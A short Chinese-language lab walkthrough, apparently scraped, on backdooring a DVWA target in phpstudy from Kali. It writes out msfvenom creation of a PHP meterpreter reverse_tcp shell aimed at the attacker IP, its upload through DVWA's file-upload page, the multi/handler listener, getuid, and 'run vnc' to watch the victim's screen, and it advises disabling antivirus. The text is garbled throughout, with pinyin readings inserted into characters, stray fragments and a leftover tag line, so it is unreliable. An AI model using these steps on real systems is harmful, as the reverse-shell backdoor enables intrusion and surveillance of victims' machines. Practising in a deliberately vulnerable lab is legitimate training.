
一臺(tái)kali虛擬機(jī)一臺(tái) win11物理機(jī)phpstudy 開啟 Nginx和Mysqlphpstudy中已經(jīng)搭建好DVWA靶場DVWA靶場的安全等級調(diào)整值low
?
注意:
(資料圖)
需要將殺毒軟件個(gè)關(guān)了, 否則有提示, 黑客入侵.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp# 接著輸入options
這里發(fā)現(xiàn) 攻擊機(jī)的端口不用設(shè)置了, 已經(jīng)有了, 只要設(shè)置lhost 就可以了
set lhost 攻擊機(jī)的ip
注意: 要新建端口, 在root權(quán)限下執(zhí)行
msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機(jī)ip lport=4444 R>shell.php
這樣在window11左面少就有這個(gè)文件了
這是我原來的地址: http://dvwa/vulnerabilities/upload/#
這是我要填寫的地址: http://dvwa/hackable/uploads/shell.php
出現(xiàn)上圖幾面說明: 這是正常的, 后門已經(jīng)上傳到了靶機(jī)上
run # 也可以直接輸入 exploit , 都一樣
也可能出現(xiàn) 404, 都是正?,F(xiàn)象
只要有這兩行, 就代表上傳的后門生效了
getuid觀看屏幕 可以在meterpreter里輸入
run vnc
點(diǎn)開文件即可看到自己電腦的畫面
標(biāo)簽: 直接輸入 黑客入侵 可能出現(xiàn)